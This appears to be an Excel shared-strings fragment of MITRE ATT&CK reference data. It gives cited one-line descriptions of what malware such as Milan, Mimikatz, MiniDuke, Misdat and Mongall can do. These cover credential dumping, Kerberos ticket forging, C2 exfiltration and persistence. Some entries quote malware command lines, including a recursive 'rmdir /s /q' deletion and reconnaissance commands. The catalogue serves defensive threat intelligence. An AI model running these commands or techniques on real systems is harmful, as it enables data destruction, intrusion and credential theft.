    <t>[Milan](https://attack.mitre.org/software/S1015) can use a COM component to generate scheduled tasks.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--5b2b610f-7563-49d0-8ee3-066cc82fd35c</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) has the ability to use DNS for C2 communications.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--1a2a6b85-7e72-409a-80bd-13a3f726de5a</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can upload files from a compromised host.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--a613f562-50d2-4677-b3ad-70e097127f6d</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can use hardcoded domains as an input for domain generation algorithms.(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--b4e22ba1-a639-4d70-896c-5f063dbdb049</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) has used an executable named `companycatalog.exe.config` to appear benign.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--eb76155e-39de-4952-857b-bf53a1586810</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can delete files via `C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 1 -w 3000 &gt; Nul &amp; rmdir /s /q`.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--dd4ab207-a8d7-4b33-94bf-be87635cc853</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) has received files from C2 and stored them in log folders beginning with the character sequence `a9850d2f`.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--4e39da36-f7e0-4e26-b354-ca34fb801e33</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) has run `C:\Windows\system32\cmd.exe /c cmd /c dir c:\users\ /s 2&gt;&amp;1` to discover local accounts.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--b0d9045a-448e-40f6-848a-7d852b1f197b</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) has saved files prior to upload from a compromised host to folders beginning with the characters `a9850d2f`.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--13e52bdf-aa82-4220-8a02-02c735c4fccf</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) has used an executable named `companycatalogue` to appear benign.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--7b43c9ba-49bc-4966-a987-2f991d0f44a2</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can use the API `DnsQuery_A` for DNS resolution.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--9b2f9a03-f477-4d1f-8542-27243fa6a3ab</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can encode files containing information about the targeted system.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--47fdcab0-5aca-4685-a2d8-8e743e3c4494</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can use a custom protocol tunneled through DNS or HTTP.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>relationship--93066a4a-0181-48cb-a2c3-3daa7ae5fefd</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can query `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid` to retrieve the machine GUID.(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--732a3283-d7ae-4d09-8446-edbd28c38ec0</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can establish persistence on a targeted host with scheduled tasks.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--0cc48b39-3f2c-4c27-be1a-0fb6cd7bcaaf</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can enumerate the targeted machine's name and GUID.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--1daf23d1-fdf0-4858-8509-836efb883f18</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can run `C:\Windows\system32\cmd.exe /c cmd /c ipconfig /all 2&gt;&amp;1` to discover network settings.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--319ddafd-7ae5-4fd5-ae80-3c7456c3878f</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can identify users registered to a targeted machine.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--4579695f-22c6-4391-a508-da942c2e0570</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can use HTTPS for communication with C2.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>relationship--72f11e69-93a9-4572-8217-0d6782b3cd44</t>
  </si>
  <si>
    <t>[Milan](https://attack.mitre.org/software/S1015) can use `cmd.exe` for discovery actions on a targeted system.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>relationship--941ea6f4-d27e-4a26-aa7f-943c218c8873</t>
  </si>
  <si>
    <t>[MimiPenguin](https://attack.mitre.org/software/S0179) can use the `&lt;PID&gt;/maps` and `&lt;PID&gt;/mem` file to search for regex patterns and dump the process memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Picus Labs Proc cump 2022)</t>
  </si>
  <si>
    <t>relationship--d3b810ed-0be4-448b-b1ac-aa3a7dd16c91</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</si>
  <si>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</si>
  <si>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relationship--6e641c36-188b-480e-b177-e412cd000b34</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</si>
  <si>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</si>
  <si>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relationship--11d0f089-6dc7-4468-b186-e1a8b621051b</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</si>
  <si>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</si>
  <si>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relationship--7804d727-91bc-41bd-9b05-686d550e9e04</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</si>
  <si>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</si>
  <si>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relationship--0209cfd7-95d3-4bc5-8f0e-72a70b245fe9</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s kerberos module can create golden tickets.(Citation: GitHub Mimikatz kerberos Module)(Citation: Cobalt Strike Manual 4.3 November 2020)</t>
  </si>
  <si>
    <t>relationship--7b8254f2-bfbb-4775-aaf8-3b5fa3457ee9</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</si>
  <si>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</si>
  <si>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relationship--f5e29f3a-99b1-4c45-952b-c238f72435ab</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</si>
  <si>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</si>
  <si>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relationship--b7930db8-2cb9-4ecf-b3d3-7425f99140d8</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</si>
  <si>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</si>
  <si>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relationship--6b83bc1e-edfc-4c6a-961f-d3757ae6a234</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</si>
  <si>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</si>
  <si>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relationship--76037b22-a3e4-40d3-bd56-699d1ea4e97e</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;CRYPTO::Extract&lt;/code&gt; module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.(Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>relationship--1c5b8ff2-400a-4e0f-a819-3cc8f1bc76b8</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)’s &lt;code&gt;LSADUMP::DCShadow&lt;/code&gt; module can be used to make AD updates by temporarily setting a computer to be a DC.(Citation: Deply Mimikatz)(Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>relationship--15fe2d8e-9a4e-433e-9dca-d7329e7ca846</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</si>
  <si>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</si>
  <si>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relationship--3e5cf341-4707-4de3-bb06-43530ee3e90f</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</si>
  <si>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</si>
  <si>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relationship--7f04a14f-ab65-4ad5-9d67-a4b509ba8087</t>
  </si>
  <si>
    <t>The [Mimikatz](https://attack.mitre.org/software/S0002) credential dumper contains an implementation of an SSP.(Citation: Deply Mimikatz)</t>
  </si>
  <si>
    <t>relationship--41f04732-8fdc-4b2f-9e22-7b78ff650e5d</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s kerberos module can create silver tickets.(Citation: GitHub Mimikatz kerberos Module)</t>
  </si>
  <si>
    <t>relationship--bf080191-d58e-4834-8b4f-7315df4d76bf</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002)'s `CRYPTO` module can create and export various types of authentication certificates.(Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>relationship--ed48d88f-840e-4653-84df-7181afc6dfd3</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) contains functionality to acquire credentials from the Windows Credential Manager.(Citation: Delpy Mimikatz Crendential Manager)</t>
  </si>
  <si>
    <t>relationship--c92047b8-50d6-4fde-8acd-98132dcdc32f</t>
  </si>
  <si>
    <t>S0133</t>
  </si>
  <si>
    <t>Miner-C</t>
  </si>
  <si>
    <t>malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234</t>
  </si>
  <si>
    <t>[Miner-C](https://attack.mitre.org/software/S0133) copies itself into the public folder of Network Attached Storage (NAS) devices and infects new victims who open the file.(Citation: Softpedia MinerC)</t>
  </si>
  <si>
    <t>relationship--e0d33a40-a0d1-49fe-bea1-d0e4f000f628</t>
  </si>
  <si>
    <t>Some [MiniDuke](https://attack.mitre.org/software/S0051) components use Twitter to initially obtain the address of a C2 server or as a backup if no hard-coded C2 server responds.(Citation: F-Secure The Dukes)(Citation: Securelist MiniDuke Feb 2013)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--1f972385-7f1c-4cbd-a071-951973e6d229</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can use DGA to generate new Twitter URLs for C2.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--430e71be-1fd2-4ff6-977d-bc4c8a7222e5</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.(Citation: Securelist MiniDuke Feb 2013)</t>
  </si>
  <si>
    <t>relationship--62c8913c-c193-4feb-ab58-88343838336d</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can enumerate local drives.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--6ed5bd9a-3f94-4ed0-94fb-0d3b93bc984e</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can download additional encrypted backdoors onto the victim via GIF files.(Citation: Securelist MiniDuke Feb 2013)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--67b49860-e1e4-4b56-bf83-108c4ac25e5c</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can can use a named pipe to forward communications from one compromised machine with internet access to other compromised machines.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--6e1e9f11-ab28-48cc-b392-f2863707fe11</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can use control flow flattening to obscure code.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--569815f7-4a3f-47f3-8903-0b0b2d409c3c</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) can gather the hostname on a compromised machine.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--30e6bb1e-7c6a-4fff-8163-f5a065d2d960</t>
  </si>
  <si>
    <t>[MiniDuke](https://attack.mitre.org/software/S0051) uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>relationship--d9e8d70a-06f6-4873-baf8-29ebfaf6bf99</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) is likely loaded via DLL hijacking into a legitimate McAfee binary.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>relationship--883762ff-5cb3-49af-87a2-6a128a1ce939</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) has a function for decrypting data containing C2 configuration information.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>relationship--f16f0b46-3363-48bd-9a13-c8751fdedf1c</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) can collect CPU and architecture information from the victim’s machine.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>relationship--47b7e027-4208-4ed6-b4ae-46941fed16be</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) can gather the username from the victim’s machine.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>relationship--cb68541e-3ca7-4e2d-892d-c30b50107b39</t>
  </si>
  <si>
    <t>[MirageFox](https://attack.mitre.org/software/S0280) has the capability to execute commands using cmd.exe.(Citation: APT15 Intezer June 2018)</t>
  </si>
  <si>
    <t>relationship--c6dc9631-b324-47d1-8bbd-975d20fa5e58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</si>
  <si>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</si>
  <si>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relationship--323eed81-9e09-44fb-9dea-bad6aae88e7f</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has collected files and data from a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--abf314e7-e379-4e8b-aab3-4a74d737a70d</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has transmitted collected files and data to its C2 server.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--cdde3e80-af48-40eb-b001-2dea47e68ad8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</si>
  <si>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</si>
  <si>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relationship--a61cf8cf-87f1-4061-ae9d-31e8162bdfef</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has downloaded additional malware and files onto a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--424b60eb-a6d1-405f-8f95-648fd6d52658</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) may create a file containing the results of the command &lt;code&gt;cmd.exe /c net user {Username}&lt;/code&gt;.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--a33c172b-9910-4f36-8373-32126201144b</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) may create a temporary user on the system named `Lost_{Unique Identifier}`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--7e55e411-230e-4d1a-a780-d07784ed2cd6</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has temporarily stored collected information to the files `“%AppData%\{Unique Identifier}\HOSTRURKLSR”` and `“%AppData%\{Unique Identifier}\NEWERSSEMP”`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--e08fbaf9-0efe-41b1-99f7-ec61f38b175c</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t>relationship--4ffe2425-c971-45e5-9256-0b1a2bf63bbf</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has used Windows API calls, including `NetUserAdd` and `NetUserDel`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--07ec1906-e634-43d5-ba87-02054fe82da6</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) network traffic can communicate over a raw socket.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--cef7d272-ee0c-4379-9d7b-63adf1f40252</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has been injected directly into a running process, including `explorer.exe`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--d83274f8-ac2b-4416-9fae-97f569dbcef2</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) uses Base64 encoding for C2 traffic.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--7f1c30eb-051f-4d1a-9d81-1ee46f7779c7</t>
  </si>
  <si>
    <t>The initial beacon packet for [Mis-Type](https://attack.mitre.org/software/S0084) contains the operating system version and file system of the victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--aeda6707-50e2-47e2-833a-18e4a5d73e88</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) may create a file containing the results of the command &lt;code&gt;cmd.exe /c ipconfig /all&lt;/code&gt;.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--39e856a1-4bab-474e-a6b2-3ce69249bc29</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) runs tests to determine the privilege level of the compromised user.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--a1e9769e-5172-4959-84d3-5a28796f86e1</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) network traffic can communicate over HTTP.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--9b80479d-6f7a-45fd-af5b-1e8adfb1e7fd</t>
  </si>
  <si>
    <t>[Mis-Type](https://attack.mitre.org/software/S0084) has used `cmd.exe` to run commands on a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--41023c59-b41e-454a-ace2-cd98d4fedb8e</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</si>
  <si>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</si>
  <si>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relationship--9c63a942-eb05-401b-a49a-39dc05ef1dd9</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of deleting Registry keys used for persistence.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--81d62795-b28f-4146-b4ff-b74da5cf514b</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) has collected files and data from a compromised host.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--6d5c4bf4-0dfb-48f7-842d-3392b16eb80e</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) has uploaded files and data to its C2 servers.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--314aca1d-01a5-4549-b274-ba1112c3ca51</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of deleting the backdoor file.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--70a1cab8-dd98-4b82-9f7f-36294e3889c0</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of running commands to obtain a list of files and directories, as well as enumerating logical drives.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--1a4c94a1-6362-42b3-b1d9-41ae3fbf5ea5</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of downloading files from the C2.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--ae3be82b-3d54-4be8-939b-e074a2cea170</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) saves itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.(Citation: Cylance Dust Storm)(Citation: Microsoft DTC)</t>
  </si>
  <si>
    <t>relationship--01ab8fee-5204-40c1-ac7a-b11a5683a87d</t>
  </si>
  <si>
    <t xml:space="preserve">[Misdat](https://attack.mitre.org/software/S0083) has used Windows APIs, including `ExitWindowsEx` and `GetKeyboardType`.(Citation: Cylance Dust Storm) </t>
  </si>
  <si>
    <t>relationship--fdd7f2b3-08e4-4f55-ba94-4b5e6d619da8</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) network traffic communicates over a raw socket.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--5e53b45b-ca14-4e8b-8c76-0cf9cb572a92</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) was typically packed using UPX.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--df4bb33c-a98d-4c02-a160-ce3cfd36f291</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) network traffic is Base64-encoded plaintext.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--a12a471b-39b2-4abf-80d0-af88d5a4f038</t>
  </si>
  <si>
    <t>The initial beacon packet for [Misdat](https://attack.mitre.org/software/S0083) contains the operating system version of the victim.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--87e080cf-b8c0-4679-bcfb-ff77ab7698f3</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) has attempted to detect if a compromised host had a Japanese keyboard via the Windows API call `GetKeyboardType`.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--d90f6beb-0936-40ca-b38c-269094d4ed02</t>
  </si>
  <si>
    <t>Many [Misdat](https://attack.mitre.org/software/S0083) samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--ea964313-8f60-4cff-800c-2ea49e2c19d7</t>
  </si>
  <si>
    <t>[Misdat](https://attack.mitre.org/software/S0083) is capable of providing shell functionality to the attacker to execute commands.(Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>relationship--b4e77f71-970a-4b24-938f-0d50ecea1969</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) has the capability to download and execute .exe files.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>relationship--d7699bcf-5732-40f5-a715-d430b00b043e</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) creates the following Registry entry: &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Micromedia&lt;/code&gt;.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>relationship--5ab3897a-4f37-4b59-99ca-f39605cb1a35</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) has the capability to gather NTLM password information.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>relationship--ac72c3da-6b58-4f66-8476-8d3cc9ccf6bd</t>
  </si>
  <si>
    <t>[Mivast](https://attack.mitre.org/software/S0080) has the capability to open a remote shell and run basic commands.(Citation: Symantec Backdoor.Mivast)</t>
  </si>
  <si>
    <t>relationship--f8a90328-b7ee-474a-9773-f5bf501defd3</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server victim browser bookmarks.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--c8786a8c-9c40-4df3-874f-952b814baec9</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) exfiltrates data collected from the victim mobile device.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--5d55979e-d4e8-44eb-97d6-e3e78baa60c7</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) exfiltrates data to its C2 server over the same protocol as C2 communications.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--4ffcf69a-c7ef-46dc-add7-9093e454a67e</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--bc72acee-e417-4de8-8084-153e141917b6</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to download a file from the C2 server to the victim mobile device's SD card.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--56d858ef-2d62-4aa9-b050-699de9b048e9</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload information about all running processes to its C2 server.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--6fdaef62-c4da-488a-a07d-c8fca2c98d85</t>
  </si>
  <si>
    <t>[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>relationship--a02da835-676d-47df-86c6-547a7d29dbae</t>
  </si>
  <si>
    <t xml:space="preserve">[MoleNet](https://attack.mitre.org/software/S0553) can download additional payloads from the C2.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>relationship--cca578fe-fe2d-44ef-bc55-9518f83f1443</t>
  </si>
  <si>
    <t xml:space="preserve">[MoleNet](https://attack.mitre.org/software/S0553) can use PowerShell to set persistence.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>relationship--3f2f8ae7-0690-4987-a00c-6b234b938fef</t>
  </si>
  <si>
    <t xml:space="preserve">[MoleNet](https://attack.mitre.org/software/S0553) can achieve persitence on the infected machine by setting the Registry run key.(Citation: Cybereason Molerats Dec 2020) </t>
  </si>
  <si>
    <t>relationship--5d036e42-7ce2-499d-b693-12504c8615ca</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can use WMI commands to check the system for firewall and antivirus software.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--ed08418e-2143-4633-bfc9-cac436adde2b</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can collect information about the about the system.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--01b542b1-3222-459b-9cdf-b91dcd29c749</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can execute commands via the command line utility.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--3ba8d601-f3f3-4ab8-b851-0c9dcfa53bc5</t>
  </si>
  <si>
    <t>[MoleNet](https://attack.mitre.org/software/S0553) can perform WMI commands on the system.(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>relationship--7196c18e-b80f-41ec-ae37-a88e99435f56</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) has the ability to upload files from victim's machines.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--86f238c5-20c2-4c94-9be9-886105c95252</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) has the ability to decrypt its payload prior to execution.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--2310e7b8-a4c7-460d-a89d-8d5854c59a44</t>
  </si>
  <si>
    <t xml:space="preserve">[Mongall](https://attack.mitre.org/software/S1026) can inject a DLL into `rundll32.exe` for execution.(Citation: SentinelOne Aoqin Dragon June 2022)
</t>
  </si>
  <si>
    <t>relationship--cc2dd0db-3679-4b14-b9a1-4aff659e2c4a</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) can upload files and information from a compromised host to its C2 server.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--c1bf0daf-42e0-426a-ba8a-ba892f688963</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) can download files to targeted systems.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--ac062b78-400d-4d9a-9c5b-95c7a1b6dd42</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) has relied on a user opening a malicious document for execution.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--23ebaddf-0f99-4ed9-9aa4-39577490fa81</t>
  </si>
  <si>
    <t xml:space="preserve">[Mongall](https://attack.mitre.org/software/S1026) can identify removable media attached to compromised hosts.(Citation: SentinelOne Aoqin Dragon June 2022)
</t>
  </si>
  <si>
    <t>relationship--3146b7d3-26c9-47c4-b114-d39a4a786fc9</t>
  </si>
  <si>
    <t xml:space="preserve">[Mongall](https://attack.mitre.org/software/S1026) can establish persistence with the auto start function including using the value `EverNoteTrayUService`.(Citation: SentinelOne Aoqin Dragon June 2022)
</t>
  </si>
  <si>
    <t>relationship--f38fa132-2485-45aa-ad86-4608595adb65</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) can use `rundll32.exe` for execution.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--7920e13a-6c7f-4609-9a6a-729c053242eb</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) has been packed with Themida.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--df0d3103-a054-43a5-9b18-d40977171736</t>
  </si>
  <si>
    <t>[Mongall](https://attack.mitre.org/software/S1026) can use Base64 to encode information sent to its C2.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--a98804cf-b3f8-40c5-beac-2a82a18c891f</t>
  </si>
